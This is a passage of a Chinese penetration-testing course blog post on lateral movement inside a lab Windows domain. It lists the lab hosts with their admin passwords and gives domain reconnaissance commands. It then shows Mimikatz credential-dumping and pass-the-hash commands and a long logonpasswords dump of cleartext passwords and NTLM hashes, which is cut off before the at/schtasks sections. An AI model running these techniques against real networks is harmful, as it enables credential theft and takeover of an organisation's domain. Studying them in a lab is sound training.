第66天-内网安全-域横向批量-at&schtasks&impacket

文章展示了内网渗透案例,包括利用Mimikatz提取凭证、at&schtasks执行远程命令及明文、HASH传递,实现多主机权限提升,涉及信息收集、认证协议破解及自动化脚本编写。

思维导图

66-1

环境配置

2008 r2 webserver

域内 web 服务器
本地管理员账号密码 :
.\administraotr:admin!@#45
当前机器域用户密码 :

god\webadmin:admin!@#45


2003 x86 fileserver

域内文件服务器
本地管理员账号密码 :
administrator : admin
当前机器域用户密码 :

god\fileadmin : Admin12345


2008 r2 x64 dc god.org

主域控机器
域管账号密码:

God\administrator : Admin12345


2012 sqlserver

域内数据库服务器
本地管理员账号密码 :
.\administrator:admin!@#45
当前机器域用户密码 :

god\dbadmin:admin!@#45


w7 x64 mary-pc

域内个人机
本地管理员账号密码 :
.\mary : admin
当前机器域用户密码 :

god\mary : admin!@#45


w8.1 x64 jack-pc

域内个人机
本地管理员账号密码 :
.\jack : admin
当前机器域用户密码 :
god\boss : Admin12345

演示案例:

横向渗透明文 HASH 传递批量利用-升级版

拿下2008 r2 webserver权限后进行信息收集

信息收集
net user
net start
tasklist
schtasks
at
ipconfig /all     判断存在域-dns
net time /domain  判断主域
netstat -ano      当前网络端口开放
nslookup   		  域名 追踪来源地址

net user

net start

66-3

tasklist

66-4

schtasks

66-5

ipconfig / all

66-6

net view /domain

66-7

net time /domain

66-8

nslookup 计算机名称

66-9

netstat -ano

66-10

mimikazt搜集收集用户凭证

log
privilege ::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:god.org/ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

  • log
  • privilege ::debug
mimikatz # Using 'mimikatz.log' for logfile : OK
mimikatz # privilege::debug
Privilege '20' OK
  • sekurlsa::logonpasswords
mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 521318 (00000000:0007f466)
Session           : Interactive from 1
User Name         : webadmin
Domain            : GOD
Logon Server      : OWA2010CN-GOD
Logon Time        : 2022/5/8 20:39:30
SID               : S-1-5-21-1218902331-2157346161-1782232778-1132
	msv :	
	 [00000003] Primary
	 * Username : webadmin
	 * Domain   : GOD
	 * LM       : e90127c07127ed12f4ebf668acca53e9
	 * NTLM     : 518b98ad4178a53695dc997aa02d455c
	 * SHA1     : 39aa99a9e2a53ffcbe1b9eb411e8176681d01c39
	tspkg :	
	 * Username : webadmin
	 * Domain   : GOD
	 * Password : admin!@#45
	wdigest :	
	 * Username : webadmin
	 * Domain   : GOD
	 * Password : admin!@#45
	kerberos :	
	 * Username : webadmin
	 * Domain   : GOD.ORG
	 * Password : admin!@#45
	ssp :	
	credman :	

Authentication Id : 0 ; 143584 (00000000:000230e0)
Session           : Service from 0
User Name         : MSSQLFDLauncher
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:53
SID               : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582
	msv :	
	 [00000003] Primary
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * NTLM     : 450098ea358ba14a9e17e3690b94c0e4
	 * SHA1     : 946f96a330bd558a1af3ee06fb4edf90ed58c909
	tspkg :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	wdigest :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	kerberos :	
	 * Username : WEBSERVER$
	 * Domain   : god.org
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEBSERVER$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:21
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * NTLM     : 450098ea358ba14a9e17e3690b94c0e4
	 * SHA1     : 946f96a330bd558a1af3ee06fb4edf90ed58c909
	tspkg :	
	wdigest :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	kerberos :	
	 * Username : webserver$
	 * Domain   : GOD.ORG
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	ssp :	
	credman :	

Authentication Id : 0 ; 47208 (00000000:0000b868)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:21
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * NTLM     : 450098ea358ba14a9e17e3690b94c0e4
	 * SHA1     : 946f96a330bd558a1af3ee06fb4edf90ed58c909
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 794675 (00000000:000c2033)
Session           : Interactive from 2
User Name         : Administrator
Domain            : WEBSERVER
Logon Server      : WEBSERVER
Logon Time        : 2022/5/8 20:47:14
SID               : S-1-5-21-95064677-3481858386-3840636109-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : WEBSERVER
	 * LM       : e90127c07127ed12f4ebf668acca53e9
	 * NTLM     : 518b98ad4178a53695dc997aa02d455c
	 * SHA1     : 39aa99a9e2a53ffcbe1b9eb411e8176681d01c39
	tspkg :	
	 * Username : Administrator
	 * Domain   : WEBSERVER
	 * Password : admin!@#45
	wdigest :	
	 * Username : Administrator
	 * Domain   : WEBSERVER
	 * Password : admin!@#45
	kerberos :	
	 * Username : Administrator
	 * Domain   : WEBSERVER
	 * Password : admin!@#45
	ssp :	
	 [00000000]
	 * Username : administrator
	 * Domain   : god.org
	 * Password : Admin12345
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:25
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 103189 (00000000:00019315)
Session           : Service from 0
User Name         : ReportServer
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2022/5/8 20:25:24
SID               : S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051
	msv :	
	 [00000003] Primary
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * NTLM     : 450098ea358ba14a9e17e3690b94c0e4
	 * SHA1     : 946f96a330bd558a1af3ee06fb4edf90ed58c909
	tspkg :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	wdigest :	
	 * Username : WEBSERVER$
	 * Domain   : GOD
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26 e1 b2 a0 57 a0 33 e7 dc b4 63 16 42 14 fd dc be a5 a6 98 5e d0 16 3a 43 9c 41 e8 08 97 16 1d 4e 95 43 b3 79 6d 60 f4 63 f2 6f af 55 d8 fa fa 69 15 75 57 98 55 62 00 a6 d8 d9 d9 5a 6a 78 89 0b 38 2b e1 85 de bc ba 65 34 10 b9 bc b5 14 0e fb a3 36 2a b7 bf 19 fd e2 49 df b7 6c a5 4b 70 b3 17 20 dc 6e 03 48 29 67 12 e2 8d b4 4a 14 24 a1 10 10 eb 94 36 c2 ef 4e 30 a3 36 b7 c6 c3 b2 75 96 a4 31 8b 5a 34 1d 77 ce cb 23 5d 3d e6 c6 65 c4 a6 f2 9d ab d8 eb c6 3d dd fe 5c d0 09 
	kerberos :	
	 * Username : WEBSERVER$
	 * Domain   : GOD.ORG
	 * Password : fd ac 43 12 ff 53 16 69 f8 69 33 47 0f 3b 98 21 2c 7d be 01 f4 19 94 1b 9a 04 e5 f9 3e 01 fe 3d 97 ea f0 09 ab 3e 20 2e da a1 f6 9a 99 87 18 77 a1 fd 5d c9 8a cb c2 f7 75 16 81 34 0e e2 7b a4 76 43 0c 97 77 bc 84 b0 ef f2 21 14 eb 9f 5e 17 03 26
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值